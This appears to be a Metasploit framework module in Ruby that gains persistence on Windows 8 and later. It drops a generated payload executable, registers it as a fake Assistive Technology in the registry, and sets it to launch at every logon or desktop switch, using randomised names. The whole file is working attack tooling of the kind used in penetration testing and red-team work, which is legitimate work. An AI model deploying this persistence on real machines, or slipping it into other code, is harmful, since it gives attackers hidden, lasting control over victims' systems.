1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::Local::Persistence
12
  prepend Msf::Exploit::Remote::AutoCheck
13
  include Msf::Post::Windows::Registry
14
  include Msf::Post::Windows::Priv
15

16
  AT_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'
17
  STARUP_REG_PATH = 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility'
18

19
  def initialize(info = {})
20
    super(
21
      update_info(
22
        info,
23
        'Name' => 'Assistive Technologies Persistence',
24
        'Description' => %q{
25
          This module achieves persistence by registering a custom Assistive Technology (AT) in the Windows registry.
26
          Then it configures the system to launch the AT executable during user logon or desktop switch (such as with
27
          an admin prived program).
28
          Requires Windows 8 or higher and administrative privileges.
29
        },
30
        'Author' => ['h00die'],
31
        'Platform' => ['win'],
32
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
33

34
        'SessionTypes' => ['meterpreter', 'shell'],
35
        'References' => [
36
          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],
37
          ['URL', 'https://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/'],
38
          ['URL', 'https://msdn.microsoft.com/ru-ru/library/windows/desktop/bb879984.aspx']
39
        ],
40
        'Targets' => [
41
          [ 'Automatic', {} ]
42
        ],
43
        'DefaultTarget' => 0,
44
        'DisclosureDate' => '2016-07-22',
45
        'Notes' => {
46
          'Stability' => [CRASH_SAFE],
47
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
48
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
49
        }
50
      )
51
    )
52

53
    register_options([
54
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
55
      OptString.new('NAME', [false, 'Name of assistive technolog to create. Random string as default.']),
56
      OptString.new('DESCRIPTION', [false, 'Description of assistive technolog to create. Random string as default.']),
57
    ])
58
  end
59

60
  def create_at(at_name, payload_path)
61
    target_key = "#{AT_REG_PATH}\\#{at_name}"
62
    at_description = datastore['DESCRIPTION'] || Rex::Text.rand_text_alpha((rand(6..13)))
63

64
    registry_createkey(target_key)
65
    registry_setvaldata(target_key, 'ApplicationName', '@%SystemRoot%\\system32\\AccessibilityCPL.dll,-85', 'REG_EXPAND_SZ')
66
    registry_setvaldata(target_key, 'ATExe', payload_path.split('\\').last, 'REG_SZ')
67
    registry_setvaldata(target_key, 'CopySettingsToLockedDesktop', 1, 'REG_DWORD')
68
    registry_setvaldata(target_key, 'Description', at_description, 'REG_SZ')
69
    registry_setvaldata(target_key, 'Profile', '<HCIModel><Accommodation type="mild dexterity"</HCIModel>', 'REG_SZ') # https://learn.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration?redirectedfrom=MSDN#hci-profile
70
    registry_setvaldata(target_key, 'SimpleProfile', at_name, 'REG_SZ')
71
    registry_setvaldata(target_key, 'StartExe', payload_path, 'REG_EXPAND_SZ')
72
    registry_setvaldata(target_key, 'TerminateOnDesktopSwitch', 0, 'REG_DWORD')
73
  end
74

75
  def writable_dir
76
    d = super
77
    return session.sys.config.getenv(d) if d.start_with?('%')
78

79
    d
80
  end
81

82
  def check
83
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
84
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
85

86
    version = get_version_info
87
    return CheckCode::Safe('Only supported on Windows 8 and above') unless version.build_number >= Msf::WindowsVersion::Win8
88

89
    return CheckCode::Safe('You have admin rights to run this Module') unless is_admin?
90

91
    CheckCode::Appears('Likely exploitable')
92
  end
93

94
  def install_persistence
95
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
96
    temp_path = writable_dir
97
    payload_exe = generate_payload_exe
98
    payload_pathname = temp_path + '\\' + payload_name
99
    payload_pathname += '.exe' unless payload_pathname.downcase.end_with?('.exe')
100

101
    vprint_status("Payload pathname: #{payload_pathname}")
102
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
103
    at_name = datastore['NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
104
    vprint_status("Creating Assistive Technology #{at_name} registry entries")
105
    create_at(at_name, payload_pathname)
106
    vprint_status('Setting AT to start during login')
107
    current_value = registry_getvaldata(STARUP_REG_PATH, 'Configuration')
108
    new_value = current_value.empty? ? [] : current_value.split(',').map(&:strip)
109
    new_value.append(at_name)
110
    registry_setvaldata(STARUP_REG_PATH, 'Configuration', new_value.join(','), 'REG_SZ')
111

112
    print_good('New AT added. Will launch on logon or desktop switch (such as with an admin prived program).')
113
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"
114
    @clean_up_rc << "execute -f cmd.exe -a '/c reg delete \"#{AT_REG_PATH}\\#{at_name}\" /f' -H\n"
115
    @clean_up_rc << "execute -f cmd.exe -a '/c reg add \"#{STARUP_REG_PATH}\" /v Configuration /t REG_SZ /d \"#{current_value}\" /f' -H\n"
116
  end
117
end
118

119